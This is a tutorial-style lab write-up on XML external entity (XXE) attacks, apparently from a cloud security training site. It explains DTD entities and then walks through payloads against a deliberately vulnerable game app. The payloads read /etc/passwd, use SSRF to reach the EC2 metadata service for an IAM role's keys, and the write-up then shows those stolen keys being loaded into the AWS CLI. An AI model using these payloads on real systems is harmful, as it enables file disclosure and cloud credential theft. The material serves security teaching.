Before we jump into the lab and start breaking things (ethically 😄🔧), let’s grab a few quick building blocks. We’ll first understand XML, DTD, and XXE with simple examples, so when the exploit chain shows up in the demo, it won’t feel like magic… it’ll feel like “yep, that checks out” ✅🧠
What is XML? 🧾 (a.k.a. “data wearing a tie”)
XML (eXtensible Markup Language) is just a way to store and send data using tags.
Think of it like a lunchbox with labeled compartments 🍱: <name>, <price>, <level>, etc.
✅ Simple XML example (normal, well-behaved)
<player>
<name>Neo</name>
<level>7</level>
<power>Invisibility</power>
</player>What’s happening here? 🧠
<player>is the outer container (like a folder 📁)- Inside it are fields like
<name>,<level>,<power> - It’s structured, readable, and boring (in a good way) 😄
What is a DTD? 📜 (the “rulebook” + “macro sheet” for XML)
DTD (Document Type Definition) is like the XML document’s instruction manual.
It can define:
- what tags are allowed ✅
- and something spicier: entities (like variables/macros) 🎭
🧩 DTD with an entity (safe-ish)
<!DOCTYPE player [
<!ENTITY cheat "GODMODE">
]>
<player>
<name>Neo</name>
<code>&cheat;</code>
</player>What’s happening? 🎬
<!DOCTYPE player [...]>says: “Here comes the rulebook”<!ENTITY cheat "GODMODE">defines a shortcut:- whenever XML sees
&cheat;, it replaces it with"GODMODE"🎮
- whenever XML sees
So output becomes basically: GODMODE
What is XXE? 🐍 (XML External Entity… the sneaky one)
XXE happens when the XML parser is allowed to load external entities.
Meaning: the attacker can say:
“Hey parser… when you see &something;, go fetch it from somewhere else 😈”
That “somewhere else” could be:
- a file on your server 📁 (
/etc/passwd) - an internal URL 🌐 (SSRF)
- cloud metadata 🧠☁️ (
169.254.169.254)
😇 A normal entity (safe)
<!DOCTYPE player [
<!ENTITY snack "🍕">
]>
<player>
<name>Neo</name>
<reward>&snack;</reward>
</player>😈 XXE example (external entity)
This makes the server try to read a local file (classic demo):
<!DOCTYPE player [
<!ENTITY secret SYSTEM "file:///etc/passwd">
]>
<player>
<name>Neo</name>
<reward>&secret;</reward>
</player>What’s happening? 💥
SYSTEM "file:///etc/passwd"tells the parser:
“Go read this file from the server and paste it here.”- If the parser allows it, your response may include file contents 😬
Bonus: XXE that becomes SSRF 🚀 (cloud-lab friendly)
This turns XML into a “server-side browser” 🕷️
<!DOCTYPE player [
<!ENTITY meta SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<player>
<name>Neo</name>
<reward>&meta;</reward>
</player>
If vulnerable:
- the server fetches the URL
- and you get back internal metadata (hello, IMDSv1 👋)
Alright, warm-up’s done ✅🔥
Now it’s time to dive into the deep end, trace the attack path step-by-step, and see this whole thing in action in the lab 🧪🚀
1️⃣ Navigate to the web application vulnerable to XXE 🕸️. This is a simulation of a game where players can control the speed of the cycle on the right side. We need to abuse the speed and probably the entire game.
https://lab.5minutescloud.com/attack-path/aws/xxe-ssrf-lab
2️⃣ Click Execute with default payload and analyse the output. This looks NORMAL ✅
<game>
<player>Player1</player>
<stats>
<speed>10</speed>
</stats>
</game>
3️⃣ Now run with <speed>100</speed>. This looks CHEAT ACTIVATED ✅
<game>
<player>Player1</player>
<stats>
<speed>100</speed>
</stats>
</game>
4️⃣ It’s time to break the GAME with the below payload where we will try to read the server files in order to test if XXE to SSRF is possible. This looks SYSTEM COMPROMISED 🚨
<!DOCTYPE foo [
<!ENTITY hack SYSTEM "file:///etc/passwd">
]>
<game>
<player>&hack;</player>
<stats>
<speed>10</speed>
</stats>
</game>
5️⃣ Since our goal is to abuse the EC2 metadata [IMDSv1] endpoint, Use the payload below with the endpoint [http://169.254.169.254/latest/meta-data/iam/security-credentials/] to extract the IAM role name. This role name will later help in fetching programmatic credentials 🛡️
<!DOCTYPE foo [
<!ENTITY hack SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<game>
<player>&hack;</player>
<stats>
<speed>10</speed>
</stats>
</game>
XXE-SSRF-IAMROLE6️⃣ Given that the role name is XXE-SSRF-IAMROLE we can retrieve the credentials using the following payload with endpoint [http://169.254.169.254/latest/meta-data/iam/security-credentials/XXE-SSRF-IAMROLE/] 🛡️🔐
<!DOCTYPE foo [
<!ENTITY hack SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/XXE-SSRF-IAMROLE/">
]>
<game>
<player>&hack;</player>
<stats>
<speed>10</speed>
</stats>
</game>
AccessKeyId, SecretAccessKey, and Token7️⃣ Configure the AWS CLI using the retrieved AccessKeyId, SecretAccessKey, and Token 👀
aws configure --profile xxe-ssrf
8️⃣ Time to check whether the credentials are working or not! ✅
aws sts get-caller-identity --profile xxe-ssrf
🔐💀 “Access granted. Time to exfiltrate the data like a pro… thank me later 🕶️💻🔥